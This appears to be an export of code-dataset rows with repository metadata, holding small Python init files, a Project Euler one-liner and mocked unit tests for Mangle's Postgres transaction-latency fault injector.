] | 246 | 2017-03-04T20:17:19.000Z | 2022-03-28T13:37:16.000Z | anime_dl/common/__init__.py | EpicUnknown/anime-dl | 753ae274243c3c4d52050f0c09778d9278112d4a | [
"MIT"
] | 114 | 2017-03-05T23:30:04.000Z | 2021-01-17T03:57:59.000Z | anime_dl/common/__init__.py | EpicUnknown/anime-dl | 753ae274243c3c4d52050f0c09778d9278112d4a | [
"MIT"
] | 59 | 2017-03-05T03:00:53.000Z | 2022-01-08T11:23:21.000Z | from . import browser_instance
from . import downloader
from . import misc | 24.666667 | 30 | 0.810811 | 10 | 74 | 5.9 | 0.6 | 0.508475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 74 | 3 | 31 | 24.666667 | 0.936508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98c68bba6ac295d08edc2621b79140629313c2a3 | 74 | py | Python | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | [
"MIT"
] | 4 | 2015-11-05T09:02:07.000Z | 2021-08-06T15:24:30.000Z | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | [
"MIT"
] | null | null | null | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | [
"MIT"
] | 2 | 2015-02-10T05:29:14.000Z | 2016-05-02T14:54:52.000Z | print sum(range(1, 101)) ** 2 - sum(map(lambda x: x ** 2, range(1, 101)))
| 37 | 73 | 0.567568 | 15 | 74 | 2.8 | 0.6 | 0.285714 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163934 | 0.175676 | 74 | 1 | 74 | 74 | 0.52459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
98dc7dddec4c8c83475e2a71b5392aac12bf00f3 | 208 | py | Python | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | [
"MIT"
] | null | null | null | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | [
"MIT"
] | null | null | null | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | [
"MIT"
] | null | null | null |
# Add functions to surgeo.db namespace
from surgeo.db.unsupress import reconstitute_data
from surgeo.db.db_setup_geocode import setup_geocode_table
from surgeo.db.db_setup_surname import setup_surname_table
| 34.666667 | 58 | 0.870192 | 33 | 208 | 5.212121 | 0.454545 | 0.186047 | 0.209302 | 0.162791 | 0.22093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091346 | 208 | 5 | 59 | 41.6 | 0.910053 | 0.173077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98f719aea43c9e3ce67f8b8cf7d6141bd7a22fc4 | 43 | py | Python | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | [
"MIT"
] | 471 | 2015-01-05T15:16:26.000Z | 2022-03-28T05:06:11.000Z | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | [
"MIT"
] | 109 | 2015-01-06T20:00:58.000Z | 2022-03-11T23:17:53.000Z | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | [
"MIT"
] | 100 | 2015-01-05T15:16:39.000Z | 2021-12-01T12:13:13.000Z | from .corsMiddleware import corsMiddleware
| 21.5 | 42 | 0.883721 | 4 | 43 | 9.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.974359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c737037cb8c73ba041dee0a1c163348cc488c1a9 | 9,737 | py | Python | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | [
"Apache-2.0"
] | 151 | 2019-05-21T13:15:43.000Z | 2022-02-23T15:04:49.000Z | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | [
"Apache-2.0"
] | 80 | 2019-10-24T07:12:58.000Z | 2022-03-31T14:08:44.000Z | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | [
"Apache-2.0"
] | 45 | 2019-05-23T05:21:26.000Z | 2022-02-17T09:57:32.000Z | from unittest import TestCase
from unittest.mock import Mock, patch, MagicMock
import psycopg2
import unittest
import os
from Faults.FaultStatus import FaultStatus
from Faults.PostgresTransactionLatencyFault import PostgresTransactionLatencyFault
'''
Unit test cases for PostgresTransactionLatencyFault.
@author: kumargautam
'''
class PostgresTransactionLatencyFaultTest(TestCase):
@classmethod
def setUp(cls):
print("Called setUp() function")
cls.fault_args = {'--operation': 'inject', '--faultname': "pg_transaction_error_fault",
"--userName": "test",
"--password": "test", "--port": 5432, "--dbName": "test", "--sslEnabled": True,
"--tableName": "customer", "--percentage": 75, "--latency": 1000,
"--timeout": 1000,
"--faultId": "1234"}
cls.fault = PostgresTransactionLatencyFault(cls.fault_args)
def test_get_status(self):
self.assertEqual(FaultStatus.NOT_STARTED.name, self.fault.get_status(self.fault_args.get('--faultId')))
@patch.object(psycopg2, 'connect')
def test_get_connection(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock', spec=psycopg2)
psycopg2_patch.return_value = connect_mock._connect()
self.assertIsNotNone(self.fault.get_connection())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock._connect.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_test_connection(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
connect_mock.close.return_value = True
self.assertTrue(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_test_connection_for_not_connected(self, psycopg2_patch):
psycopg2_patch.return_value = None
self.assertFalse(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
@patch.object(psycopg2, 'connect')
def test_test_connection_for_error(self, psycopg2_patch):
psycopg2_patch.side_effect = Exception("user_name/password not matched")
self.assertFalse(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
def test_close_connection_for_error(self):
connect_mock = Mock(name='connect_mock')
connect_mock.close.side_effect = Exception("Close connection error")
self.fault.close_connection(connect_mock)
connect_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_table_exist(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.return_value = (True,)
cursor_mock.close.return_value = True
self.assertTrue(self.fault.is_table_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_table_exist_for_error(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = Exception("Not able to fetch data from db")
cursor_mock.close.return_value = True
self.assertFalse(self.fault.is_table_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_trigger_exist(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.return_value = (1,)
cursor_mock.close.return_value = True
self.assertTrue(self.fault.is_trigger_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_trigger_exist_for_error(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = Exception("Not able to fetch data from db")
cursor_mock.close.return_value = True
self.assertFalse(self.fault.is_trigger_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_trigger_injection(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
connect_mock.commit.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = [[True], [0]]
cursor_mock.close.return_value = True
self.fault.trigger_injection()
self.assertEqual(2, psycopg2_patch.call_count)
self.assertEqual(2, connect_mock.cursor.call_count)
connect_mock.close.assert_called()
self.assertEqual(2, cursor_mock.execute.call_count)
cursor_mock.close.assert_called()
connect_mock.commit.assert_called()
@patch.object(psycopg2, 'connect')
def test_remediate(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
connect_mock.commit.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.close.return_value = True
os._exit = MagicMock()
self.fault.remediate()
self.assertEqual(1, psycopg2_patch.call_count)
self.assertEqual(1, connect_mock.cursor.call_count)
connect_mock.close.assert_called()
self.assertEqual(1, cursor_mock.execute.call_count)
cursor_mock.close.assert_called()
connect_mock.commit.assert_called()
# assert os._exit.called
@patch.object(psycopg2, 'connect')
def test_clean(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
connect_mock.commit.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.close.return_value = True
self.assertTrue(self.fault.clean())
self.assertEqual(1, psycopg2_patch.call_count)
self.assertEqual(1, connect_mock.cursor.call_count)
connect_mock.close.assert_called()
self.assertEqual(1, cursor_mock.execute.call_count)
cursor_mock.close.assert_called()
connect_mock.commit.assert_called()
@patch.object(psycopg2, 'connect')
def test_clean_for_error(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
connect_mock.commit.side_effect = Exception("Error during commit")
cursor_mock.execute.return_value = 1
cursor_mock.close.return_value = True
self.assertFalse(self.fault.clean())
self.assertEqual(1, psycopg2_patch.call_count)
self.assertEqual(1, connect_mock.cursor.call_count)
connect_mock.close.assert_called()
self.assertEqual(1, cursor_mock.execute.call_count)
cursor_mock.close.assert_called()
connect_mock.commit.assert_called()
@classmethod
def tearDown(cls):
print("Called tearDown() function")
cls.fault = None
if __name__ == '__main__':
unittest.main()
| 43.86036 | 111 | 0.701962 | 1,175 | 9,737 | 5.485957 | 0.08766 | 0.133106 | 0.063295 | 0.058641 | 0.819578 | 0.804685 | 0.789172 | 0.776295 | 0.768694 | 0.754576 | 0 | 0.012605 | 0.201499 | 9,737 | 221 | 112 | 44.058824 | 0.816463 | 0.002259 | 0 | 0.680412 | 0 | 0 | 0.070079 | 0.002699 | 0 | 0 | 0 | 0 | 0.340206 | 1 | 0.082474 | false | 0.010309 | 0.036082 | 0 | 0.123711 | 0.010309 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c73b8e820a6c08b76b01b2c10ee394c0921b3dbc | 191 | py | Python | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | [
"MIT"
] | 31 | 2021-09-15T00:43:43.000Z | 2022-03-27T22:57:21.000Z | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | [
"MIT"
] | 1 | 2021-12-09T03:08:13.000Z | 2021-12-15T07:08:31.000Z | robo_utils/oxford/__init__.py | IamWangYunKai/DG-TrajGen | 0a8aab7e1c05111a5afe43d53801c55942e9ff56 | [
"MIT"
] | 2 | 2021-11-26T05:45:18.000Z | 2022-01-19T12:46:41.000Z |
from . import utils
from .partial import PartialDataset
from .process import ProcessUtils
from .partial_augment import PartialDatasetAugment
from .partial_master import PartialDatasetMaster | 27.285714 | 50 | 0.863874 | 21 | 191 | 7.761905 | 0.52381 | 0.202454 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109948 | 191 | 7 | 51 | 27.285714 | 0.958824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c7d1b55d9dbaae3a7d25aa933a7d0bca9daa0a5b | 45 | py | Python | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | common/__init__.py | codestetic/optionworkshop | f7f8c7ab1744069255da0d156916d0c376137040 | [
"MIT"
] | null | null | null | from common.instruments.option_type import *
| 22.5 | 44 | 0.844444 | 6 | 45 | 6.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.